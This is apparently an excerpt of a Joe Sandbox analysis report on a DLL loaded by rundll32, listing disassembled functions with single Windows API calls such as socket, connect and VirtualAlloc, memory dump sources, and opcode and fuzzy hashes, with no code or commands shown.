                              • Instruction ID: 0e349c0a45bb4f16f21d9bf5092175465f0f06c9d92dc0a0f0d34807e97ed062
                              • Opcode Fuzzy Hash: dad356ac42783e76d3cf91e48cabaf882a4a52e62c98378efd60bf509c916298
                              • Instruction Fuzzy Hash: ECF09671A04108BBDB44DFA4DC50EEE77BCAB45204F404514BA05936A0DF31B86987B2
                              Function 6CD72BE0 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                              Download Yara Rule
                              APIs
                              • setsockopt.WS2_32(00000003,?,?,?,?,00000003,00000000), ref: 6CD72C3E
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: setsockopt
                              • String ID:
                              • API String ID: 3981526788-0
                              • Opcode ID: 33aa635ea641d7b2bbf4fc67c1b7518cf2bd9494986aeaef0e39e160fadc9dce
                              • Instruction ID: 41380333d35e9061f371a5c5c1950f4832554ca2471d8a1473a7333a0266beda
                              • Opcode Fuzzy Hash: 33aa635ea641d7b2bbf4fc67c1b7518cf2bd9494986aeaef0e39e160fadc9dce
                              • Instruction Fuzzy Hash: 77F0BB71A04108BBDF14DFA4DC50EDBB7BCAB49304F404615FD0593660DB30A969CBB1
                              Function 6CD63E70 Relevance: 1.5, APIs: 1, Instructions: 32timeCOMMON
                              Download Yara Rule
                              APIs
                              • SetTimer.USER32(00000000,?,?,?,00000000,00000000,?,?,?,6CD51206,?,6CD7D9A0,00000000,6CD78224,00000004,C0505E62), ref: 6CD63ECA
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: Timer
                              • String ID:
                              • API String ID: 2870079774-0
                              • Opcode ID: 642c631768ab5b01f60a1d3519f165255ea776a0c5d062dafa75fb49f30b7342
                              • Instruction ID: 92de62b967c386fc13979cbeb93dd69bfb448874b9ce9790402977162e8b8f72
                              • Opcode Fuzzy Hash: 642c631768ab5b01f60a1d3519f165255ea776a0c5d062dafa75fb49f30b7342
                              • Instruction Fuzzy Hash: 13F05E76A00108BBEF00DFA4EC41E9E3BBCAB04205F404614FA0693A60EB74993CC7F2
                              Function 6CD524B0 Relevance: 1.5, APIs: 1, Instructions: 30registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegisterServiceCtrlHandlerExW.ADVAPI32(6CD51430,?,?,6CD51430,00000000,?,6CD7D8E8), ref: 6CD52506
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: CtrlHandlerRegisterService
                              • String ID:
                              • API String ID: 1823773585-0
                              • Opcode ID: ece4e555ece233fb5ff78e6cfd6db67ad757d928d4604c05794b1f3c186408fb
                              • Instruction ID: 0f064574d4ec71f31ccaf7aad8757ddb87bc185540fb9de38339d89bcf608bd5
                              • Opcode Fuzzy Hash: ece4e555ece233fb5ff78e6cfd6db67ad757d928d4604c05794b1f3c186408fb
                              • Instruction Fuzzy Hash: B9F0E275A01148ABFF00DF60DC41FAE37BCAB45204F404618FD0656A61DB30682887A1
                              Function 6CD76D90 Relevance: 1.5, APIs: 1, Instructions: 30networkCOMMON
                              Download Yara Rule
                              APIs
                              • connect.WS2_32(6CD6BECA,?,?,6CD6BECA,?), ref: 6CD76DE6
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: connect
                              • String ID:
                              • API String ID: 1959786783-0
                              • Opcode ID: 45c172d999c75058e427c133feacb02cc9d5dee3c1c8aaa8deeef8986d1895c1
                              • Instruction ID: cc115691ef2b4949235425078b16cef59aeddd6da6486c9fededc9b6fb51688c
                              • Opcode Fuzzy Hash: 45c172d999c75058e427c133feacb02cc9d5dee3c1c8aaa8deeef8986d1895c1
                              • Instruction Fuzzy Hash: 74F08275A04108BBDF40DB60DC45EAE7778AB19205F84861ABA05A7A60EB3165298BB1
                              Function 6CD66510 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                              Download Yara Rule
                              APIs
                              • LookupPrivilegeValueW.ADVAPI32(00000028,?,?,00000028,00000000), ref: 6CD66566
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: LookupPrivilegeValue
                              • String ID:
                              • API String ID: 3899507212-0
                              • Opcode ID: ebed34cb5d0192e69e4b94a4199ed589c0e709f46a7918ef62d8aaea67947168
                              • Instruction ID: 80a1e222d88c420cc964e3d0e2771c793e8563ae3b6f6a0b86c20c1615034f07
                              • Opcode Fuzzy Hash: ebed34cb5d0192e69e4b94a4199ed589c0e709f46a7918ef62d8aaea67947168
                              • Instruction Fuzzy Hash: FCF082B5A00108BBEB40EF64DC45EAE37B8AB05705F404519F90592B60EB31552887B6
                              Function 6CD72D10 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                              Download Yara Rule
                              APIs
                              • ioctlsocket.WS2_32(00000003,?,?,00000003,00000000), ref: 6CD72D66
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: ioctlsocket
                              • String ID:
                              • API String ID: 3577187118-0
                              • Opcode ID: ee4236a2a702e8c3edbecc3c18ab7b1e37d68fd5d564df37df11398e5de44bde
                              • Instruction ID: 952a8bfb649fa073c06233ede1a3d3eb15d8312998342280d346b1bac7659fbc
                              • Opcode Fuzzy Hash: ee4236a2a702e8c3edbecc3c18ab7b1e37d68fd5d564df37df11398e5de44bde
                              • Instruction Fuzzy Hash: 98F08975A40148B7DB00EB60DC45F9E7778DB55205F804619F90566660DB7065A887E1
                              Function 6CD76E80 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                              Download Yara Rule
                              APIs
                              • getsockname.WS2_32(FC1009F2,?,?,FC1009F2,00000010,6CD6BF40,?), ref: 6CD76ED6
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: getsockname
                              • String ID:
                              • API String ID: 3358416759-0
                              • Opcode ID: d63d86737e5609536dd5f63d6b5a6c6031ab1265f10a343c45f619f3455087b8
                              • Instruction ID: ec0f3654287fcc86d377941f9c5ff509f070b4204eb7330926dff23d9a195a14
                              • Opcode Fuzzy Hash: d63d86737e5609536dd5f63d6b5a6c6031ab1265f10a343c45f619f3455087b8
                              • Instruction Fuzzy Hash: 48F08275A05248BBEF40DF64DC42FAF7778AB05308F804619BA0997661EB70A92987B1
                              Function 6CD527C0 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000008,?,?,00000008,6CD5404E,6CD5404E,?,00000000,?), ref: 6CD52816
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 74dbb6728f1d286a8b1fa667c5bfe827359f01a5e9dd11901c193e6843bc4328
                              • Instruction ID: ee6f9b31ac0439b0e8558a1c15f10d79069e23cd68e3151fcff2fc9e01a727dd
                              • Opcode Fuzzy Hash: 74dbb6728f1d286a8b1fa667c5bfe827359f01a5e9dd11901c193e6843bc4328
                              • Instruction Fuzzy Hash: 80F02775A01208BBEF40DFA0DC84EAE7B78BF51209F408119F902A2BA0DB30556C87F1
                              Function 6CD52830 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • RtlFreeHeap.NTDLL(6CD5402A,?,?,6CD5402A,00100000,00000000,?), ref: 6CD52886
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: FreeHeap
                              • String ID:
                              • API String ID: 3298025750-0
                              • Opcode ID: 65450ccf743c13e6fa79299203e1e4126f4d4af6ef41b5e046ef13e7b51b78e3
                              • Instruction ID: 0dd580bd0d2d2a708221308a568d5da5b2507102375ab74cf0daad19c774bea0
                              • Opcode Fuzzy Hash: 65450ccf743c13e6fa79299203e1e4126f4d4af6ef41b5e046ef13e7b51b78e3
                              • Instruction Fuzzy Hash: 10F08275A05109BBEF04DFA4DC54EAE7B78AB11209F40451AFE0566B60EB3095298BF1
                              Function 6CD72B00 Relevance: 1.5, APIs: 1, Instructions: 30networkCOMMON
                              Download Yara Rule
                              APIs
                              • socket.WS2_32(00000003,?,?,00000003,00000000), ref: 6CD72B56
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: socket
                              • String ID:
                              • API String ID: 98920635-0
                              • Opcode ID: 5cd40c1645c14745527f3d399d6dd96a5833a0befe4364d1993fc28cce2381be
                              • Instruction ID: 130d49fea7ff32c0168649605018614dc47385a6768889c07e35125f2aeb164f
                              • Opcode Fuzzy Hash: 5cd40c1645c14745527f3d399d6dd96a5833a0befe4364d1993fc28cce2381be
                              • Instruction Fuzzy Hash: 11F02771E08108BBDF00EF64DC50FAE77BCAB85209F804319F90557660EB30A56887B1
                              Function 6CD76CD0 Relevance: 1.5, APIs: 1, Instructions: 28networkCOMMON
                              Download Yara Rule
                              APIs
                              • WSAStartup.WS2_32(00000202,?,00000202,?), ref: 6CD76D23
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: Startup
                              • String ID:
                              • API String ID: 724789610-0
                              • Opcode ID: e72a6f6ce703aa31e7feeb420ad4b7cd24b56d16e9627383b1b00c8c2fe94ed7
                              • Instruction ID: 379e3439c21b5382db8d54de69601a3011fceda44eeb5db5fdb9d07a37915e51
                              • Opcode Fuzzy Hash: e72a6f6ce703aa31e7feeb420ad4b7cd24b56d16e9627383b1b00c8c2fe94ed7
                              • Instruction Fuzzy Hash: 35F0E531A00108B7EF50ABB0DC1AFAD77BCAB15309FC04615FA02A2A60FB30552D83B1
                              Function 6CD72C50 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                              Download Yara Rule
                              APIs
                              • shutdown.WS2_32(00000003,?,00000003,00000000), ref: 6CD72CA2
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: shutdown
                              • String ID:
                              • API String ID: 2510479042-0
                              • Opcode ID: e2764e321720279d74f118bf49c2681229943feff53a3246b0ebcaff81fea256
                              • Instruction ID: b5b37b227f2e8ccb0f6cd1d0d7d09c86e1dca0d39b50681c3f623605cefe0f25
                              • Opcode Fuzzy Hash: e2764e321720279d74f118bf49c2681229943feff53a3246b0ebcaff81fea256
                              • Instruction Fuzzy Hash: 32F0EC75E002487BEF00FB60DC15F9D777CA751209F400619F90562A60EB70656CC7F1
                              Function 6CD74F90 Relevance: 1.5, APIs: 1, Instructions: 28threadCOMMON
                              Download Yara Rule
                              APIs
                              • SetThreadPriority.KERNEL32(00000000,?,00000000,000000FE), ref: 6CD74FE2
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: PriorityThread
                              • String ID:
                              • API String ID: 2383925036-0
                              • Opcode ID: 42857ab16e7a6299d6bf1809229be9953031de691842af9566a09b10cefa3fb0
                              • Instruction ID: 232efa7751b5a2382902f556378489b75beeb6a76766cca0bdc1d1cbc89f1b62
                              • Opcode Fuzzy Hash: 42857ab16e7a6299d6bf1809229be9953031de691842af9566a09b10cefa3fb0
                              • Instruction Fuzzy Hash: F7F0E579B00108BBEF40EFA0DC40EA97778EB04209F808116B90666AA1EB30956C8BF1
                              Function 6CD71C40 Relevance: 1.5, APIs: 1, Instructions: 26networkCOMMON
                              Download Yara Rule
                              APIs
                              • InternetCloseHandle.WININET(6CD7153F,6CD7153F,00000000,00000000,00000000,00001000), ref: 6CD71C8E
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: CloseHandleInternet
                              • String ID:
                              • API String ID: 1081599783-0
                              • Opcode ID: bf52bbd2db66bd9e44b4533dfad085d2fee0b515ae873ebf53cba4c71f462a43
                              • Instruction ID: 1a34270ccf5241e039cdcb4411e4c77f8f10ee1e40c0502b3c89ccdc8df6356f
                              • Opcode Fuzzy Hash: bf52bbd2db66bd9e44b4533dfad085d2fee0b515ae873ebf53cba4c71f462a43
                              • Instruction Fuzzy Hash: 7CE06571E0410877EF009BB0DD95EEE76B8AB15205F404695EA0566BA0DF31A52D87B2
                              Function 6CD56F30 Relevance: 1.5, APIs: 1, Instructions: 26COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • FindCloseChangeNotification.KERNEL32(00020008,00020008,00000000), ref: 6CD56F7E
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: ChangeCloseFindNotification
                              • String ID:
                              • API String ID: 2591292051-0
                              • Opcode ID: 2862687b37968d99fcc3cea738217dd7bb03a4c77093d750d5867d8eb56867aa
                              • Instruction ID: 5f746846c8e2ecff8fbaa65ccf7a17f48c90812a418902f7a911a27dec9a5113
                              • Opcode Fuzzy Hash: 2862687b37968d99fcc3cea738217dd7bb03a4c77093d750d5867d8eb56867aa
                              • Instruction Fuzzy Hash: 06E0657DA08104ABEF00EFB1DC05FADB67C9B11209F404669A91567A61EF70D56C8BA1
                              Function 6CD6D910 Relevance: 1.5, APIs: 1, Instructions: 26networkCOMMON
                              Download Yara Rule
                              APIs
                              • gethostbyname.WS2_32(00000003,00000003,00000000), ref: 6CD6D95E
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: gethostbyname
                              • String ID:
                              • API String ID: 930432418-0
                              • Opcode ID: 7ef5c247c825d72d8fcdbea57a7d5eaad840772876cb0382bfea117f7d256506
                              • Instruction ID: ac761d9519ab18adb88fa8407c55cd4ec587835cc36b45bbcedc556e5f5c259e
                              • Opcode Fuzzy Hash: 7ef5c247c825d72d8fcdbea57a7d5eaad840772876cb0382bfea117f7d256506
                              • Instruction Fuzzy Hash: 69E0E530E002087BFF00AB60EC44EAE777C9B01219F401621B90163AA0EB30557983A1
                              Function 6CD536C0 Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAlloc.KERNEL32(?,?,?,?,?,6CD6E40E), ref: 6CD5371A
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 539a0726094d348e2a04e5b7ef643a528ab2cfb0fcb54ac4e4ca118b484b0bd1
                              • Instruction ID: 4f7e6e94b9f1c4ee54ddf013e898287d6fa8900d735b89b917a7d526e38606e1
                              • Opcode Fuzzy Hash: 539a0726094d348e2a04e5b7ef643a528ab2cfb0fcb54ac4e4ca118b484b0bd1
                              • Instruction Fuzzy Hash: 6AF08975B05109BBDF00DFA4DC50F9E3BBCAB46305F414555F90567A60EB709D2887B1
                              Function 6CD53730 Relevance: 1.3, APIs: 1, Instructions: 30COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • VirtualFree.KERNELBASE(00000000,?,?,00000000,00008000,?,6CD6E762,00000001), ref: 6CD53786
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: FreeVirtual
                              • String ID:
                              • API String ID: 1263568516-0
                              • Opcode ID: 4176f8359608c8c30addf78dd67cf5dd0635cab5e262e43529ee2f6d2d4d1aa6
                              • Instruction ID: 9764ae590ad41cf6b9da0b832190ec3d0d969108077ca1c07380b0f198fd9d10
                              • Opcode Fuzzy Hash: 4176f8359608c8c30addf78dd67cf5dd0635cab5e262e43529ee2f6d2d4d1aa6
                              • Instruction Fuzzy Hash: 3FF0E276B05204BBEF40DFA0DC80FAE7B78AB11309F414119B90663B60DB70996887F1
                              Function 6CD523F0 Relevance: 1.3, APIs: 1, Instructions: 28stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcmpiW.KERNEL32(00000000,?,00000000,00000000), ref: 6CD52442
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
